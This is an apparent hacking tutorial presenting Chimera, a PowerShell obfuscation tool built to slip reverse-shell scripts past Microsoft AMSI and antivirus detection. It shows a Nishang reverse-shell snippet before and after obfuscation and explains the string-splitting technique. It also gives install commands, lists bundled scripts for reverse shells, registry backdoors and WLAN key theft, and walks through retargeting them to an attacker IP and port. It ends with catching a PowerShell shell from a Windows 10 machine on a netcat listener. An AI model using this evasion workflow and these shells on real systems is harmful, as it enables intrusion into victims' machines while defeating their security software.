Bypass VirusTotal & AMSI Detection Signatures with Chimera

Chimera is a PowerShell obfuscation script designed to bypass Microsoft’s AMSI as well as commercial antivirus solutions. It digests malicious PowerShell scripts known to trigger antivirus software and uses simple string substitution and variable concatenation to evade common detection signatures.

Below is a snippet of Nishang’s Invoke-PowerShellTcp.ps1, found at nishang/Shells. In the below PowerShell terminal, the attacker is downloading Nishang’s script (“shell.ps1”) which will invoke a connection to a remote server. When attempting to execute PowerShell scripts in this way, AMSI will use signature-based detection to identify malicious activity. VirusTotal reports 25 detections of the PS1 script and AMSI prevents the attack.

$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}

#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)

#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)

VirusTotal Detection	AMSI Detection

And here’s the same snippet, after Chimera. An arbitrary message is printed in the terminal as a connection is established to the attacker’s server. VirusTotal reports 0 detections of the obfuscated version and AMSI has no issues executing the script.

  # Watched anxiously by the Rebel command, the fleet of small, single-pilot fighters speeds toward the massive, impregnable Death Star.
              $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
       # As the station slowly moves into position to obliterate the Rebels, the pilots maneuver down a narrow trench along the station’s equator, where the thermal port lies hidden.
          [bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
   # Darth Vader leads the counterattack himself and destroys many of the Rebels, including Luke’s boyhood friend Biggs, in ship-to-ship combat.

  # Finally, it is up to Luke himself to make a run at the target, and he is saved from Vader at the last minute by Han Solo, who returns in the nick of time and sends Vader spinning away from the station.
           # Heeding Ben’s disembodied voice, Luke switches off his computer and uses the Force to guide his aim.
   # Against all odds, Luke succeeds and destroys the Death Star, dealing a major defeat to the Empire and setting himself on the path to becoming a Jedi Knight.
           $PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`nCoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
# Far off in a distant galaxy, the starship belonging to Princess Leia, a young member of the Imperial Senate, is intercepted in the course of a secret mission by a massive Imperial Star Destroyer.
            $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)
   # An imperial boarding party blasts its way onto the captured vessel, and after a fierce firefight the crew of Leia’s ship is subdued.

VirusTotal Detection	AMSI Detection

Chimera does several things to obfuscate the source. The transformer function will separate strings into multiple pieces and reconstruct them as new variables.

For example, it will take a string like ... New-Object System.Net.Sockets.TCPClient ... and convert it to:

$a = "Syste"
$b = "m.Net.Soc"
$c = "kets.TCP"
$d = "Client"

... New-Object $a$b$c$d ...

The function separates commonly flagged data types and strings into several chunks. It defines the chunks and concatenates them at the top of the script. A higher --level will result in smaller chunks and more variables.

$CNiJfmZzzQrqZzqKqueOBcUVzmkVbllcEqjrbcaYzTMMd = "`m"
$quiyjqGdhQZgYFRdKpDGGyWNlAjvPCxQTTbmFkvTmyB = "t`Rea"
$JKflrRllAqgRlHQIUzOoyOUEqVuVrqqCKdua = "Get`s"
$GdavWoszHwDVJmpYwqEweQsIAz = "ti`ON"
$xcDWTDlvcJfvDZCasdTnWGvMXkRBKOCGEANJpUXDyjPob = "`L`O`Ca"
$zvlOGdEJVsPNBDwfKFWpvFYvlgJXDvIUgTnQ = "`Get`-"
$kvfTogUXUxMfCoxBikPwWgwHrvNOwjoBxxto = "`i"
$tJdNeNXdANBemQKeUjylmlObtYp = "`AsC`i"
$mhtAtRrydLlYBttEnvxuWkAQPTjvtFPwO = "`G"
$PXIuUKzhMNDUYGZKqftvpAiQ = "t`R`iN

Review the README, and USAGE guide on GitHub for an in-depth look at how Chimera is used.

sudo apt-get update; sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git #depends
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera #clone the repo
sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/ #permissions
sudo chmod +x chimera.sh; ./chimera.sh --help #print help menu

In the shells/ directory are several Nishang scripts and a few generic ones. All have been tested and are working. However, there’s no telling how untested scripts will reproduce with Chimera. It’s recommended to use only the included shells.

/opt/chimera$ ls -laR shells/

shells/:
total 60
-rwxrwx--- 1 user user 1727 Aug 29 22:02 generic1.ps1
-rwxrwx--- 1 user user 1433 Aug 29 22:02 generic2.ps1
-rwxrwx--- 1 user user  734 Aug 29 22:02 generic3.ps1
-rwxrwx--- 1 user user 4170 Aug 29 22:02 Invoke-PowerShellIcmp.ps1
-rwxrwx--- 1 user user  281 Aug 29 22:02 Invoke-PowerShellTcpOneLine.ps1
-rwxrwx--- 1 user user 4404 Aug 29 22:02 Invoke-PowerShellTcp.ps1
-rwxrwx--- 1 user user  594 Aug 29 22:02 Invoke-PowerShellUdpOneLine.ps1
-rwxrwx--- 1 user user 5754 Aug 29 22:02 Invoke-PowerShellUdp.ps1
drwxr-xr-x 2 user user 4096 Aug 30 18:53 misc
-rwxrwx--- 1 user user  616 Aug 29 22:02 powershell_reverse_shell.ps1

shells/misc:
total 36
-rwxrwx--- 1 user user 1757 Aug 12 19:53 Add-RegBackdoor.ps1
-rwxrwx--- 1 user user 3648 Aug 12 19:53 Get-Information.ps1
-rwxrwx--- 1 user user  672 Aug 12 19:53 Get-WLAN-Keys.ps1
-rwxrwx--- 1 user user 4430 Aug 28 23:31 Invoke-PortScan.ps1
-rwxrwx--- 1 user user 6762 Aug 29 00:27 Invoke-PoshRatHttp.ps1

Before using the scripts, change the hardcoded IP addresses (192.168.56.101) to your Kali address.

/opt/chimera$ sed -i 's/192.168.56.101/<YOUR-IP-ADDRESS>/g' shells/*.ps1

The default port with all of the scripts is 4444. Use sed again to change them if needed.

/opt/chimera$ sed -i 's/4444/<YOUR-DESIRED-PORT>/g' shells/*.ps1

Use the following command to obfuscate one of the available scripts with Chimera.

/opt/chimera$ ./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -o /tmp/chimera.ps1 -g -v -t -j -i -c -h -s -b -e

 _____________________________________________________

  ░░░░░░ ░░   ░░ ░░ ░░░    ░░░ ░░░░░░░ ░░░░░░   ░░░░░
 ▒▒      ▒▒   ▒▒ ▒▒ ▒▒▒▒  ▒▒▒▒ ▒▒      ▒▒   ▒▒ ▒▒   ▒▒
 ▓▓      ▓▓▓▓▓▓▓ ▓▓ ▓▓ ▓▓▓▓ ▓▓ ▓▓▓▓▓   ▓▓▓▓▓▓  ▓▓▓▓▓▓▓
 ██      ██   ██ ██ ██  ██  ██ ██      ██   ██ ██   ██
  ██████ ██   ██ ██ ██      ██ ███████ ██   ██ ██   ██
 _____________________________________________________

 ░ by @tokyoneon_

In a new terminal, start a Netcat listener to receive incoming connections. Be sure to use -v as some of the scripts don’t produce a shell prompt when a new connection is established. Move the /tmp/chimera.ps1 file to a local Windows 10 machine. Then, open a PowerShell terminal and execute the file with the following command.

PS> powershell.exe -ep bypass C:\path\to\chimera.ps1

Back in Kali, the nc terminal will produce the following output — with no complaints from AMSI.

~$ nc -v -l -p 4444

listening on [any] 4444 ...
192.168.56.105: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.105] 49725
Windows PowerShell running as user  on
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\target>

^{Authored by tokyoneon, this post was originally published on WonderHowTo.}